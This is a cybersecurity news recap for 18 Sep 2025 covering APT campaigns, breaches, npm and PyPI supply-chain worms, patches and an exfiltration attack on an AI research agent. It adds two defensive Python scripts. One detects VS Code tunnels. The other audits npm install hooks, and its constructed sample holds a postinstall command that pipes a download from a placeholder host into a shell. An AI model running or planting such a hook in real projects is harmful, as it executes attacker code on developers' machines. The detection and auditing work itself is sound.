Cybersecurity News | Daily Recap [18 Sep 2025]

Today's Daily Recap highlights a wave of state and geopolitical activity, including APT28's Phantom Net campaign against Ukraine and TA415's Silent Spy operations leveraging VS Code remote tunnels, plus AI-driven disinformation tied to Romania and cross-border attacks against India's infrastructure. The cybercrime section notes high-profile breaches (Tiffany, Insight Partners, Brevard) and evolving tooling (CountLoader, SystemBC), alongside AI-enabled phishing and credential theft on cloud platforms, notable incidents such as Scattered Spider and JLR, and regulatory actions shaping the risk landscape. #PhantomNet #SilentSpy #RomaniaInfluence #IndiaAttacks #AfghanistanNetban #PolandResponse #ScatteredTeens #JLRAttack #CountLoader #SystemBC #RevengeHotels #SonicWallNotice #ShadowLeak #AICrypto #ShinyHunters #GhostActionTokens #Shai-hulud #SilentSync #GlassAction

State & Geopolitical Threats

  • APT28 ran the modular “Phantom Net Voxel” campaign using social engineering, steganography and cloud C2 to target Ukrainian government systems – Phantom Net
  • TA415 continues spearphishing U.S. government and academic targets, abusing VS Code remote tunnels and cloud services for covert access and economic espionage – Silent Spy, VS Code Spy
  • Authorities say a Russia-linked hybrid campaign used AI disinformation, bot farms and cyberattacks to influence Romania’s 2024 elections, leading to arrests and charges – Romania Influence
  • Coordinated hacktivist campaigns and DDoS/defacement operations are targeting India’s infrastructure, raising regional tensions and cross-border concerns – India Attacks
  • The Taliban ordered fiber-optic internet shutdowns in several Afghan provinces, deepening isolation and disrupting education and the economy – Afghanistan Netban
  • Russia-linked intrusions prompted Poland to boost cybersecurity spending to €1bn after attacks on hospitals and water systems, highlighting hybrid-threat escalation – Poland Response
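The TA415 item above turns on a legitimate feature, VS Code Remote Tunnels, being used as a covert access channel. The following is an added detection example written for this recap, not code from any vendor or from the reporting it summarizes. It scans constructed process-creation and DNS events (the JSON field names `type`, `host`, `user`, `cmd` and `query` are assumptions of this example; map your EDR and DNS fields onto them) for the documented `code tunnel` CLI invocation, the `tunnel service install` persistence variant, and lookups of the tunnel service domains `*.devtunnels.ms` and `*.tunnels.api.visualstudio.com`.

```python
"""Flag VS Code Remote Tunnel activity in process and DNS telemetry.

Added example. The event shape (JSON objects with type/host/user/cmd/query)
and the sample events are constructed for this demo; map your EDR and DNS
fields onto them. The domain list and CLI syntax come from the documented
VS Code Remote Tunnels feature.
"""
import json
import re

# Service domains contacted by VS Code Remote Tunnels (Dev Tunnels backend).
TUNNEL_DOMAINS = ("devtunnels.ms", "tunnels.api.visualstudio.com")

# `code tunnel ...` starts a tunnel; `code tunnel service install` registers
# it as a service that survives reboots, i.e. persistence.
TUNNEL_CMD = re.compile(
    r"""(?:^|[\\/\s"'])(?:code|code-insiders|code-tunnel)(?:\.exe|\.cmd)?["']?\s+tunnel\b""",
    re.IGNORECASE,
)
SERVICE_CMD = re.compile(r"\btunnel\s+service\s+install\b", re.IGNORECASE)

# Constructed sample telemetry (hosts, users and paths are invented).
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws-17", "user": "alice",
     "cmd": r'"C:\Program Files\Microsoft VS Code\Code.exe" --new-window'},
    {"type": "process", "host": "ws-17", "user": "alice",
     "cmd": "code.exe tunnel --accept-server-license-terms --name ws-17"},
    {"type": "process", "host": "srv-db-02", "user": "svc_backup",
     "cmd": r"C:\Users\Public\code.exe tunnel service install --accept-server-license-terms"},
    {"type": "dns", "host": "srv-db-02", "user": "svc_backup",
     "query": "global.rel.tunnels.api.visualstudio.com"},
    {"type": "dns", "host": "ws-03", "user": "bob",
     "query": "update.code.visualstudio.com"},
    {"type": "dns", "host": "ws-04", "user": "carol",
     "query": "abcd1234.devtunnels.ms"},
    {"type": "process", "host": "ws-05", "user": "dave",
     "cmd": "notepad.exe tunnel.txt"},
]


def _is_tunnel_domain(name):
    """Exact or subdomain match against TUNNEL_DOMAINS (no substring matches)."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in TUNNEL_DOMAINS)


def classify(event):
    """Return (severity, reason) for one event, or None if it is benign."""
    if event.get("type") == "process":
        cmd = event.get("cmd", "")
        if TUNNEL_CMD.search(cmd):
            if SERVICE_CMD.search(cmd):
                return "high", "VS Code tunnel installed as a service (persistence)"
            return "medium", "VS Code tunnel started from the CLI"
    elif event.get("type") == "dns":
        query = event.get("query", "")
        if _is_tunnel_domain(query):
            return "medium", f"DNS lookup for tunnel service domain {query}"
    return None


def scan(events, allowed_users=frozenset()):
    """Run classify() over events. Tunnels are a legitimate developer feature,
    so users on the allow-list are downgraded to 'info', except when the
    tunnel was installed as a service, which warrants a look regardless."""
    findings = []
    for event in events:
        hit = classify(event)
        if hit is None:
            continue
        severity, reason = hit
        if event.get("user") in allowed_users and severity != "high":
            severity = "info"
        findings.append({"host": event.get("host"), "user": event.get("user"),
                         "severity": severity, "reason": reason})
    return findings


def scan_jsonl(text, allowed_users=frozenset()):
    """Same as scan() for newline-delimited JSON, skipping blank lines."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    return scan(events, allowed_users)


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS, allowed_users={"alice"}):
        print(f"[{f['severity']:6}] {f['host']}/{f['user']}: {f['reason']}")
```

The allow-list exists because developers do use tunnels; the point is to notice tunnels started by service accounts, on servers, or registered as a persistent service, where there is no developer to have started them. The DNS match is deliberately suffix-based so that `update.code.visualstudio.com` (ordinary VS Code updates) does not fire.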

Cybercrime & Ransomware

  • UK police charged two teens tied to the Scattered Spider group over the Transport for London hack, part of a wave of transnational attacks linked to U.S. healthcare and corporate intrusions – Scattered Teens, TfL Arrests
  • The Jaguar Land Rover cyberattack attributed to LAPSUS$/related actors has stalled production, extended shutdowns and sparked supplier losses and layoff fears across the UK auto sector – JLR Attack, JLR Halt, JLR Shockwave
  • Multiple breaches hit organizations: Tiffany exposed data for over 2,500 customers (gift cards), VC firm Insight Partners warned >12,000 impacted after a ransomware/social-engineering incident, and Medical Associates of Brevard leaked ~250,000 patient records linked to BianLian – Tiffany Breach, Insight Breach, Brevard Leak
  • New and expanding toolsets fuel ransomware campaigns: CountLoader (multi-version loader) and modular loaders deliver Cobalt Strike and PureHVNC mainly in Ukraine; SystemBC turns infected VPS into a proxy network with >1,500 daily bots – CountLoader, SystemBC
  • Hotel-focused group RevengeHotels/TA558 and related campaigns use AI-generated phishing to deploy Venom RAT, exfiltrate payment data, and target hospitality chains globally – Hotel RAT, Hotel Theft
  • SonicWall confirmed attackers accessed cloud-stored firewall backup files and urged credential resets for under 5% of customers after brute-force access; multiple advisories and follow-ups published – SonicWall Notice, SonicWall Follow-up, SonicWall Advisory
  • Law enforcement continues pressure on cybercriminal infrastructure: the founder of BreachForums was resentenced to 3 years, underscoring efforts to disrupt dark-web marketplaces and forums – BreachForums Case
  • Emerging tactics include fake AnyDesk installers and DLL sideloading used to push MetaStealer and Cephalus ransomware, showing evolving infection chains and social engineering ruses – MetaStealer Tactics

Supply Chain & Package Ecosystem

  • PyPI saw malicious packages delivering the SilentSync RAT across Windows, Linux and macOS, illustrating rising risks to developers from package-supply-chain attacks – SilentSync
  • Open-source ecosystems reacted after the GhostAction supply-chain compromise: PyPI invalidated stolen tokens (3,300+ secrets across ecosystems) to prevent misuse – GhostAction Tokens
  • A self-replicating worm dubbed Shai-hulud infected 180+ npm packages by abusing stolen GitHub/npm credentials and malicious workflows, expanding automated supply-chain risks – Shai-hulud
  • Mass credential/token theft hit cloud CRMs as ShinyHunters claimed ~1.5 billion Salesforce records stolen via compromised OAuth tokens, underscoring OAuth and cloud-token risks – ShinyHunters
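The PyPI, GhostAction and Shai-hulud items above share one execution point: code that runs automatically when a package is installed. What follows is an added example for this recap, not code from npm, PyPI or any of the projects named above. It audits an installed `node_modules` tree for `preinstall`/`install`/`postinstall`/`prepare` hooks, flags hooks that fetch from the network or evaluate inline code, and checks whether the project's `.npmrc` sets `ignore-scripts=true`. The package tree it builds is constructed in a temp directory and every package name in it is invented.

```python
"""Audit installed npm packages for install-time lifecycle scripts.

Added example, not code from any of the projects named above. npm runs
preinstall/install/postinstall/prepare scripts automatically on `npm install`,
which is the execution point many package-supply-chain payloads rely on. The
sample package tree is constructed here; package names are invented.
"""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic: a lifecycle script that fetches from the network, evaluates
# inline code or decodes blobs deserves a human look before install.
RISKY = re.compile(r"curl|wget|Invoke-WebRequest|\bnode\s+-e\b|eval\(|base64|https?://",
                   re.IGNORECASE)


def audit_node_modules(project_dir):
    """Return one finding per lifecycle hook found under node_modules."""
    findings = []
    for pkg_json in Path(project_dir).rglob("package.json"):
        pkg_dir = pkg_json.parent
        if "node_modules" not in pkg_dir.parts:
            continue  # the project's own package.json, not a dependency
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; skip rather than crash
        scripts = meta.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            command = scripts.get(hook)
            if command:
                findings.append({
                    "package": meta.get("name", pkg_dir.name),
                    "version": meta.get("version"),
                    "hook": hook,
                    "command": command,
                    "risky": bool(RISKY.search(command)),
                })
    return findings


def npmrc_ignores_scripts(project_dir):
    """True if the project's .npmrc sets ignore-scripts=true."""
    npmrc = Path(project_dir) / ".npmrc"
    if not npmrc.exists():
        return False
    for line in npmrc.read_text(encoding="utf-8").splitlines():
        key, _, value = line.strip().partition("=")
        if key.strip() == "ignore-scripts" and value.strip().lower() == "true":
            return True
    return False


def write_npmrc(project_dir, ignore_scripts=True):
    """Write a minimal .npmrc that enables or disables lifecycle scripts."""
    value = "true" if ignore_scripts else "false"
    (Path(project_dir) / ".npmrc").write_text(f"ignore-scripts={value}\n", encoding="utf-8")


def build_sample_project():
    """Create a constructed node_modules tree in a temp dir (invented packages)."""
    root = Path(tempfile.mkdtemp())
    packages = [
        {"name": "left-pad-ish", "version": "1.0.0", "scripts": {"test": "jest"}},
        {"name": "@acme/native-build", "version": "2.3.1",
         "scripts": {"install": "node-gyp rebuild"}},  # legitimate native build
        {"name": "telemetry-helper", "version": "0.4.2",
         "scripts": {"postinstall": "node -e \"require('child_process')"
                                    ".execSync('curl -s https://example.invalid/p | sh')\""}},
    ]
    for meta in packages:
        pkg_dir = root / "node_modules" / meta["name"]  # scoped names become nested dirs
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(meta), encoding="utf-8")
    # The project's own manifest is not a dependency and must be skipped.
    (root / "package.json").write_text(
        '{"name": "demo-app", "scripts": {"postinstall": "echo own"}}', encoding="utf-8")
    return root


if __name__ == "__main__":
    project = build_sample_project()
    for f in audit_node_modules(project):
        flag = "RISKY " if f["risky"] else "      "
        print(f"{flag}{f['package']}@{f['version']} {f['hook']}: {f['command']}")
    print("ignore-scripts set:", npmrc_ignores_scripts(project))
```

Running the audit in CI before `npm ci` gives a reviewable list of every package that will execute code at install time; `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) then blocks all of them, at the cost of running `npm rebuild` explicitly for the native modules you have reviewed. This does not detect a compromised package whose payload lives in the code you later `require`, so it complements, rather than replaces, token rotation and lockfile pinning.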

Vulnerabilities & Patch Alerts

  • Google patched an actively exploited Chrome zero-day CVE-2025-10585 (V8 type confusion) — users should update immediately; multiple write-ups and advisories published – Chrome Zero-Day, Chrome Patch, Chrome Advisory
  • WatchGuard released fixes for a critical Firebox RCE vulnerability CVE-2025-9242 in Fireware OS and urged immediate patching to prevent exploitation – WatchGuard Fix
  • Open-source screenshot tool Greenshot was found vulnerable to code execution via WM_COPYDATA in versions ≤1.3.300; upgrade to 1.3.301 now – Greenshot Patch
  • Microsoft warned that Office 2016 and Office 2019 reach end-of-support on 14 Oct 2025 (plus Windows 10 and older Exchange versions), urging migrations to avoid security gaps – MS End-of-Support

AI, Crypto & Emerging Threats

  • Researchers disclosed ShadowLeak, a server-side data-theft attack that targeted ChatGPT’s Deep Research by tricking the model into exfiltrating sensitive data — OpenAI mitigated the issue – ShadowLeak
  • AI-driven scams fueled an unprecedented crypto crime wave in H1 2025 with more than $3.01 billion stolen via deepfakes and automated social-engineering, increasing scale and realism of attacks – AI Crypto
  • Threat actors increasingly use AI in operations: TA558’s hotel and restaurant campaigns employ AI-generated scripts to deploy Venom RAT, and new guidance urges preparation for quantum- and AI-era threats, including adoption of quantum-safe cryptography – AI RAT, AI & Quantum Guide

Industry, Events & Funding

  • Glilot Capital raised $500 million to back cybersecurity, AI and enterprise startups, bringing AUM to >$1 billion and signaling resilient cyber VC interest – Glilot Raise
  • VC and security funding news: Irregular raised $80 million for AI security testing and RegScale closed $30 million for its GRC/CCM platform – Irregular $80M, RegScale $30M
  • Events and thought leadership: Black Hat’s CISO podcast (Episode 8) and an Attack Surface Management virtual summit offer tactical guidance on leadership, crisis management and reducing cloud attack surface – BlackHat CISO, ASM Summit
  • Microsoft added free AI features to Notepad on Copilot+ Windows 11 PCs (local/cloud models) while reminding admins of product lifecycles—useful for end-user security and UX planning – Notepad AI

Privacy & Regulation

  • Australia’s privacy regulator ruled Kmart’s facial-recognition pilot unlawful for collecting biometric data without consent, stressing legal limits on retail surveillance – Kmart Ruling
  • A U.S. judge rejected Meta’s attempt to overturn liability in the Flo health-data privacy case, reinforcing scrutiny over app data collection and consumer privacy rights – Flo Verdict

Cybersecurity News | Daily Recap – hendryadrian.com